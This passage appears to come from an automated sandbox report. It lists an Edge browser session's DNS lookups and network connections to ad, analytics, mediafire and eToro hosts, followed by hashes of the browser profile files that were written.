| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| DE | 142.250.181.234:443 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| DE | 91.228.74.200:443 | secure.quantserve.com | tcp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| DE | 18.66.102.66:443 | rules.quantcount.com | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.253.64:443 | static.edge.microsoftapp.net | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 88.221.135.41:443 | www.bing.com | udp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| GB | 23.73.139.35:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| DE | 142.250.185.131:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 88.221.135.27:443 | www.bing.com | udp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.17.151.117:443 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | 5037696af0ff5e683b975b6910e8f451.safeframe.googlesyndication.com | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | pixel.quantserve.com | udp |
| US | 8.8.8.8:53 | pixel.quantserve.com | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | connectid.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | connectid.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| DE | 216.58.206.33:443 | 5037696af0ff5e683b975b6910e8f451.safeframe.googlesyndication.com | udp |
| DE | 216.58.206.33:443 | 5037696af0ff5e683b975b6910e8f451.safeframe.googlesyndication.com | udp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | tcp |
| DE | 91.228.74.200:443 | pixel.quantserve.com | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| BE | 64.233.166.155:443 | stats.g.doubleclick.net | tcp |
| GB | 18.165.159.204:443 | cdn.prod.uidapi.com | tcp |
| DE | 142.250.185.98:443 | ep1.adtrafficquality.google | udp |
| DE | 142.250.186.163:443 | www.google.co.uk | udp |
| DE | 18.66.102.2:443 | connectid.analytics.yahoo.com | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | download1339.mediafire.com | udp |
| US | 8.8.8.8:53 | download1339.mediafire.com | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| GB | 87.248.114.11:443 | ups.analytics.yahoo.com | tcp |
| US | 205.196.123.27:443 | download1339.mediafire.com | tcp |
| US | 35.190.39.111:443 | esp.rtbhouse.com | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| DE | 162.19.138.82:443 | id5-sync.com | tcp |
| DE | 142.250.186.33:443 | ep2.adtrafficquality.google | tcp |
| US | 104.26.2.173:443 | www.mediafiredls.com | tcp |
| DE | 162.19.138.82:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | econventa.com | udp |
| US | 8.8.8.8:53 | econventa.com | udp |
| DE | 162.19.138.116:443 | lb.eu-1-id5-sync.com | tcp |
| US | 205.196.123.27:443 | download1339.mediafire.com | tcp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 172.67.69.81:443 | econventa.com | udp |
| GB | 87.248.114.11:443 | ups.analytics.yahoo.com | tcp |
| US | 35.190.39.111:443 | esp.rtbhouse.com | tcp |
| DE | 65.9.66.68:443 | tags.crwdcntrl.net | udp |
| DE | 162.19.138.82:443 | lb.eu-1-id5-sync.com | tcp |
| DE | 142.250.186.33:443 | ep2.adtrafficquality.google | tcp |
| US | 104.26.2.173:443 | www.mediafiredls.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| US | 104.26.2.173:443 | www.mediafiredls.com | tcp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | tcp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| DE | 142.250.186.36:443 | www.google.com | udp |
| IE | 52.16.255.172:443 | bcp.crwdcntrl.net | tcp |
| IE | 52.16.255.172:443 | bcp.crwdcntrl.net | tcp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | ww3.qktrackapp.com | udp |
| US | 8.8.8.8:53 | ww3.qktrackapp.com | udp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ww3.qktrackapp.com | udp |
| US | 8.8.8.8:53 | ww3.qktrackapp.com | udp |
| GB | 54.230.10.57:443 | ww3.qktrackapp.com | tcp |
| GB | 54.230.10.57:443 | ww3.qktrackapp.com | tcp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 34.120.135.53:443 | oajs.openx.net | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| DE | 142.250.186.33:443 | ep2.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| DE | 142.250.186.33:443 | ep2.adtrafficquality.google | tcp |
| US | 34.120.135.53:443 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | go.etoro.com | udp |
| US | 8.8.8.8:53 | go.etoro.com | udp |
| GB | 23.214.118.122:443 | go.etoro.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| DE | 172.217.16.194:443 | googleads.g.doubleclick.net | udp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| US | 8.8.8.8:53 | marketing.etorostatic.com | udp |
| US | 8.8.8.8:53 | marketing.etorostatic.com | udp |
| GB | 2.22.96.95:443 | marketing.etorostatic.com | tcp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | gem.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | gem.gbc.criteo.com | udp |
| FR | 185.235.86.38:443 | gem.gbc.criteo.com | tcp |
| FR | 185.235.86.213:443 | ag.gbc.criteo.com | tcp |
| FR | 178.250.7.13:443 | dnacdn.net | tcp |
| US | 8.8.8.8:53 | etoro-cdn.etorostatic.com | udp |
| US | 8.8.8.8:53 | etoro-cdn.etorostatic.com | udp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| DE | 142.250.186.36:443 | www.google.com | udp |
| DE | 142.250.186.33:443 | ep2.adtrafficquality.google | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| DE | 142.250.185.98:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| DE | 142.250.186.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | dd-js.etoro.com | udp |
| US | 8.8.8.8:53 | dd-js.etoro.com | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.18.86.42:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | dd-js.etoro.com | udp |
| US | 8.8.8.8:53 | dd-js.etoro.com | udp |
| DE | 143.204.98.104:443 | dd-js.etoro.com | tcp |
| DE | 143.204.98.104:443 | dd-js.etoro.com | tcp |
| US | 104.18.86.42:443 | cdn.cookielaw.org | tcp |
| DE | 143.204.98.104:443 | dd-js.etoro.com | tcp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 104.18.32.137:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | dc.services.visualstudio.com | udp |
| US | 8.8.8.8:53 | dc.services.visualstudio.com | udp |
| NL | 20.50.88.233:443 | dc.services.visualstudio.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 51.11.108.188:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 88.221.135.48:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 199.232.214.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 104.17.151.117:443 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 88.221.134.250:443 | www.bing.com | tcp |
| GB | 88.221.134.250:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| GB | 88.221.134.250:443 | www.bing.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d96dd443513e4309f4f3944b61a8d1c1 |
| SHA1 | dbefb726f1a23b2793ddceb8b28daa469b85a45f |
| SHA256 | e54750ee8dcad9bfd302c17aac33de2b7f739465a93173eb05b18723e00a15cb |
| SHA512 | b1e72d4eb8a521c342cd3bc7dd9df665146b1fc927fa2a76a84817efcc7df756c01e13278327b80587a24e9a5c4351055de67597f28c122da21f62c01d1acc86 |
\??\pipe\crashpad_3892_UVFPARCCEOEFNMMK
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 50682d36ea29dc25028cb8219fc8a699 |
| SHA1 | f986acb0971c6b7337f450510cab2cb6f74164e8 |
| SHA256 | da7fcfc287a041747fbcd486e0e8791a5fb30c64e345e73918d41cee1f655484 |
| SHA512 | 5e582708ff6a5e6fd56da0a1d5448fbde1588f704178a8347880357c8b29a113cb0660dc22ed2702ba34a7be7d7d7ac37451c16f473d03ce8273025e35d9bcc8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | b743dd6e1e37d10331d4de4da799a788 |
| SHA1 | c9f108a917b1dfc6a55079b09fc3fe541f94a000 |
| SHA256 | 2df81482ae971725928b1c252020dda4df151cc0d17d1fb00180c8df7a3d8e61 |
| SHA512 | 66b4372bd6b1d3256e9a8e57274493df6a8b4d54c2ffb0f893b15fa875f2f3c30921e13298d5bb1edc834e9c5d2e0d0062c3ab70e7b2452fa1e80efc752e92bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | ed9025915b4d450eb78e3f8a4194c10a |
| SHA1 | 270f3b7b7d6e86f28124b10665f3761ce48076c1 |
| SHA256 | f096f01bfe6438965d0a9677ca8c000f4cd736ef8a9c74c5425f6808307b1332 |
| SHA512 | 4e4d61df1eb338799057461dd9fd256ee1ca84678629457d96f5dcabd7337acc4dcc9f93ca2085f41b5a41021c092c253d547af9e75420ed0df4ee9378a1115f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c416f81c37e0f72d4746edf9a89bbc54 |
| SHA1 | 8ec3b2170d409e02239b75a5c5405f66b98dca13 |
| SHA256 | 0d6758e7fb9e6c1326868a83af435ac7575ae538cf6c41544f595290a9ca2c37 |
| SHA512 | a525cdca6ea1e64f5c1d229cbe01653068e21c416592ce29641c86ac090388e905c0169ffb15c55e8781d49d765175a64637957b69757824ca3826a806c1b38e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 06d55006c2dec078a94558b85ae01aef |
| SHA1 | 6a9b33e794b38153f67d433b30ac2a7cf66761e6 |
| SHA256 | 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd |
| SHA512 | ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60
| MD5 | b0917d8e6c5b6be358bff67f84eb8336 |
| SHA1 | a6e221edcb19a1cc81575b4ddd927fd9a6fbdd6d |
| SHA256 | dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60 |
| SHA512 | cd5822bbf91e8f7f5ab2b471a4bf8b464bde95465e2fccc6a57e5a287ca55d5062bdd6d4b3cd76f8529ee7a9081b6a7aad7dc2a7581c344ce4fd2d3256bdf451 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 70cf388bfb224f13bbda5aa2259b9555 |
| SHA1 | 5143b80847e134dd3e156e77d1965b34c33a3bf8 |
| SHA256 | 460ef5b61a16c8f79dc75a139a7094a4e23de2be9c939c5a23581a806eb24db3 |
| SHA512 | f034eaf35761bfd620ef94144cc489d2232a1d996262efc04790dabe5bc3a3ca0e1962c8051255b2c8b782811ee605954d20748b90be2544bba1e8650f4ff20b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | c068467b0f8a192d0bc21534cc1cd5a2 |
| SHA1 | 62d2ef721469d357ba7fb4d76f7de636add6605c |
| SHA256 | 03caa628b0052260a068cf5cf88e478ecf44cd2cec978a740f179545e939a145 |
| SHA512 | e5febfa10ef2cbccae310691e1aca3bd95fd804aa2230cad32598d8aa51921072678734ef2bb54509e67727d1856dd77c918b1c179c8c775228d6faddff70f1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 537262650d4221699a6180d3ce84fdb3 |
| SHA1 | 5cafcd2d37a20431bd9d986d35b9038e76d26188 |
| SHA256 | aa0b30c4cfacb932a93fff721cd57a57647016b2564af660eca00f2b8c90efb2 |
| SHA512 | 9dbe72d03c0d36d9e82b256afaa4cd454d9f97547c90f1f3313c624bbfb30fdf195bc7b90122470f4eab6e62434ffa78569118d2200cb81f0d77c0c0271b0a91 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57d4d4.TMP
| MD5 | a6ded319994831632738522e40f22561 |
| SHA1 | 1d28a0c4dc71fbea02d87f8678504dccd25aea99 |
| SHA256 | 6354905e6cf9a5559aa69ec9d939d38f071bc3ae7d25ba3d0ef5c374682eb4d8 |
| SHA512 | 636120a3ad1b53e64477e7dedf163a2b58636b8174520f2bbd79d4bd1547cd4ee9cc3d97075aaafa9ec7858f3bb574e1caca463fe383862a6805633292c57b46 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6961f0238adf896f44335ec3b85154cc |
| SHA1 | cca4fae83a557d557a5d88b1867608ac0662547e |
| SHA256 | 622edd9eca35effa8f8e859401b1e14762038eb704fe8b5647366973fccd55c1 |
| SHA512 | 95def2b8dc34b4ce6343b30df594eba0fec989b0434b7d873dfd026869fa8d37a70cad76750360704d8eaf94fde00d2378939e0fcf29227fdc806e21c86bbb23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 703f50ff899cd3158fb1eb485426316f |
| SHA1 | 8ca19e27c521882065e4effbea01260a60ed216f |
| SHA256 | 21d77f1e260c43b896432db56a6a01672c722d1f2c9df657261d3bef0f91f5fb |
| SHA512 | b085ea0866bdc1d602c3c8fcbb8c2a1db072c636e8ebc29e2b0c8490691cb46500b03518e55edf98ad569cf6638ddfa88ecc4fc9b684ac25340fd51c330448ca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | c26d9900111e591c07216585169bc512 |
| SHA1 | 6b648672a7b3aaf67f321d6b76971f02914f4bdb |
| SHA256 | f575a05e567822525657b1f403334c1f678e243444583885a867a268c5135c6d |
| SHA512 | 36227a84068cf1a8c85a0e75e625a8aa8c804d5424ced7dc23cc15117b746d871ffc618f749f0df317fee8592f4f75ed6899f49987e23ee77fa5652cfb2bd518 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig
| MD5 | 3f8927c365639daa9b2c270898e3cf9d |
| SHA1 | c8da31c97c56671c910d28010f754319f1d90fa6 |
| SHA256 | fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2 |
| SHA512 | d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | c1119eb3263ea787ebd59d8932d3a59d |
| SHA1 | 3fc9124fe21145152a35c08f47893d5e2c540032 |
| SHA256 | 49e076ec450b8f8f0fa26691457d218df6d1b4fff9220a5023cc91076ae2d7f1 |
